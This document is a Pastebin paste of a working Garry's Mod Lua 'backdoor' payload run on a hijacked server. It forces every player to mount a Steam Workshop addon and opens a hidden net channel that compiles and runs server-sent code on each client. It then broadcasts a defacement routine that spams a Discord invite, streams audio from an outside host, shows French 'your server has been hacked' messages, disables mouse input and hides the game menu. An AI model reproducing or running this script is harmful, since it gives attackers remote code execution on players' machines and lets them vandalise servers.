Advertisement
Guest User

Untitled

a guest
Jun 26th, 2019
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.98 KB | None | 0 0
  1. for k, v in pairs(player.GetAll()) do
  2. v:SendLua("steamworks.FileInfo(1781610581,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  3. end
  4.  
  5. for k, v in pairs( player.GetAll() ) do
  6. if ( v:Alive() ) then
  7. v:GodEnable()
  8. else
  9. v:Spawn()
  10. timer.Simple( 5, function()
  11. v:GodEnable()
  12. end)
  13. end
  14. end
  15.  
  16.  
  17. game.AddParticles( "particles/comite.pcf" )
  18. PrecacheParticleSystem("enigma")
  19.  
  20. local function rdm_str(len)
  21. if !len or len <= 0 then return '' end
  22. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  23. end
  24.  
  25. local net_string = rdm_str(25)
  26.  
  27. util.AddNetworkString(net_string)
  28. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  29. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  30. if !ply:IsBot() then
  31. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  32. end
  33. end)
  34.  
  35. local function SendToClient(code)
  36. local data = util.Compress(code)
  37. local len = #data
  38. net.Start(net_string)
  39. net.WriteUInt(len, 16)
  40. net.WriteData(data, len)
  41. net.Broadcast()
  42. end
  43.  
  44. timer.Simple( 17, function()
  45. SendToClient([====[
  46. local t = "https://discord.gg/uXXNfmv"
  47. if t:len() > 0 then
  48. surface.CreateFont("\xFF\xFF\xFF", {
  49. font = "Impact",
  50. size = 999
  51. })
  52.  
  53. for i = 1, 10 do
  54. ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  55. end
  56.  
  57. GizehSSV = GizehSSV or {}
  58. GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  59. GizehSSVLogo = GizehSSVLogo or nil
  60. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  61. timer.Create("qqyptebobvnq", 5, 0, function()
  62. local time = tonumber(0)
  63. local Message = {
  64. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  65. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  66. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  67. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  68. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  69. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  70. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  71. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  72. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  73. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  74. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  75. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  76. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  77. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  78. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  79. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  80. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  81. }
  82. for _, line in pairs(Message) do
  83. time = time + tonumber(0.1)
  84. timer.Simple(time,function()
  85. if not GizehSSV.Enabled then return end
  86. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  87. end)
  88. end
  89. end)
  90.  
  91. local mat = Matrix()
  92. hook.Add("HUDPaint","\xFFmlg_text\xFF", function()
  93. surface.SetFont("\xFF\xFF\xFF")
  94. local x = ScrW() / 2 - (surface.GetTextSize(t)/2) + math.cos(CurTime()*3) * 40
  95. local y = 100 + math.sin(CurTime()*2) * 40
  96. local pos = Vector(x,y,0)
  97. mat:SetAngles(Angle(0,math.sin(CurTime()/1.2)*10,0))
  98. mat:SetTranslation(pos)
  99. surface.SetTextPos(0,0)
  100. cam.PushModelMatrix(mat)
  101. for i=#t, 1, -1 do
  102. surface.SetTextColor( HSVToColor((CurTime()*200+i*7)%360,1,1) )
  103. surface.DrawText(t[ #t - i + 1 ])
  104. end
  105. cam.PopModelMatrix()
  106. end)
  107. else
  108. hook.Remove("HUDPaint","\xFFmlg_text\xFF")
  109. end
  110.  
  111. local chair = ClientsideModel("models/props_c17/chair02a.mdl")
  112. chair:SetNoDraw(true)
  113. local data = {}
  114. local function genChair(id)
  115. local pos = LocalPlayer():GetPos()
  116. data[id] = { Vector(math.random(pos.x-1000,pos.x+1000),math.random(pos.y-1000,pos.y+1000),pos.z + math.random(800,1000) ), math.random(10, 70) }
  117. end
  118. for i=1, 70 do
  119. genChair(i)
  120. end
  121. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF",function()
  122. local z = LocalPlayer():GetPos().z
  123. for i=1, #data do
  124. chair:SetPos(data[i][1])
  125. chair:SetupBones()
  126. chair:DrawModel()
  127. data[i][1].z = data[i][1].z - data[i][2] / 20
  128. if data[i][1].z <= z then
  129. genChair(i)
  130. end
  131. end
  132. end)
  133.  
  134. local gfx = {}
  135.  
  136. local messages = {
  137. "Votre serveur a était hacké par le comité d'éclateur de serveur",
  138. "la ref#8219 NeRoW.#7280 Esma Network lvl 998#6877",
  139. "Discord: https://discord.gg/uXXNfmv",
  140. "Votre serveur va plutôt bien marcher",
  141. "Maintenant il nous appartient.",
  142. "Vous pouvez maintenant pleurer.",
  143. "#Owned #Hacked #Tonserveurcdlamerde"
  144. }
  145.  
  146.  
  147. hook.Add("HUDPaint", "FUCKIT_G",function()
  148. for k,v in pairs(gfx) do
  149. v()
  150. end
  151. end)
  152.  
  153. local message = "Ne redemmare pas ton server, cela ne sert a rien"
  154. local function SlowType(msg,interval,callback)
  155. callback = callback or function()end
  156. message = ""
  157. for i=1,#msg do
  158. timer.Simple(interval * i,function()
  159. message = message .. msg[i]
  160. end)
  161. end
  162. timer.Simple(#msg*interval,callback)
  163. end
  164. local function GetRandomSpot()
  165. local ppos = LocalPlayer():GetPos()
  166. return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  167. end
  168. surface.CreateFont("PWN",{bold=true,size=40})
  169. SOUNDSTART_CTP = false
  170. sound.PlayURL("https://testfdh.000webhostapp.com/larefclemeilleur.mp3","no block",function(s)
  171. if not s then return end
  172. if SOUNDSTART_CTP then s:Stop() return end
  173. SOUNDSTART_CTP = true
  174.  
  175.  
  176. local ragtbl = {}
  177. for i=1,20 do
  178. ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" )
  179. ragtbl[i]:SetNoDraw( false )
  180. ragtbl[i]:DrawShadow( true )
  181. end
  182.  
  183.  
  184. timer.Create("ChangeRagdolesSpotsAW", 1, 0, function()
  185. for k,v in pairs(ragtbl) do
  186. v:SetPos(GetRandomSpot())
  187. end
  188. end)
  189.  
  190.  
  191. hook.Add("AdjustMouseSensitivity","MDR",function()
  192. return 0
  193. end)
  194. gfx["CoolEffect"] = function()
  195. local tbl = {}
  196. s:FFT(tbl,FFT_2048)
  197.  
  198. local fal = 0
  199. for i=4,6 do
  200. fal = fal + tbl[i]
  201. end
  202.  
  203. if fal > 0.8 then
  204. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  205. gfx["ColorChange"] = function()
  206. draw.RoundedBoxEx(250, 0, 0, ScrW(),ScrH(),ca)
  207. end
  208. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  209. local mats = Entity(0):GetMaterials()
  210. for k,v in pairs(mats) do
  211. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  212. Material(v):SetVector("$color", Vector(r,g,b))
  213. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  214. end
  215. end
  216. for k,v in pairs(tbl) do
  217. local col = HSVToColor(k * 1 % 360,1,1)
  218. draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  219. draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  220. end
  221. end
  222.  
  223. timer.Simple(29, function()
  224.  
  225. hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  226. return a,b,c+140,d
  227. end)
  228.  
  229.  
  230. end)
  231.  
  232. local cc = 1
  233. local omgs = {}
  234. timer.Create("MVSPOS", 0.04, 0, function()
  235. for k,v in pairs(omgs) do
  236. if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  237. omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  238. end
  239. end)
  240. local isPounding = false
  241.  
  242. timer.Create("NEXTMSG", 6, #messages, function()
  243. if cc > #messages then
  244. isPounding = true
  245. return
  246. end
  247. table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  248. cc = cc + 1
  249. end)
  250.  
  251. gfx["MessageC"] = function()
  252. if isPounding and (#messages <= 0) then
  253. draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  254. end
  255. for k,v in pairs(omgs) do
  256. draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  257. end
  258. end
  259. end)
  260. concommand.Add("canard", function()
  261. hook.Remove("GetMotionBlurValues", "YASS")
  262. hook.Remove("AdjustMouseSensitivity","MDR")
  263. hook.Remove("HUDPaint", "FUCKIT_G")
  264. end)
  265.  
  266. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  267. ]====])
  268.  
  269. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement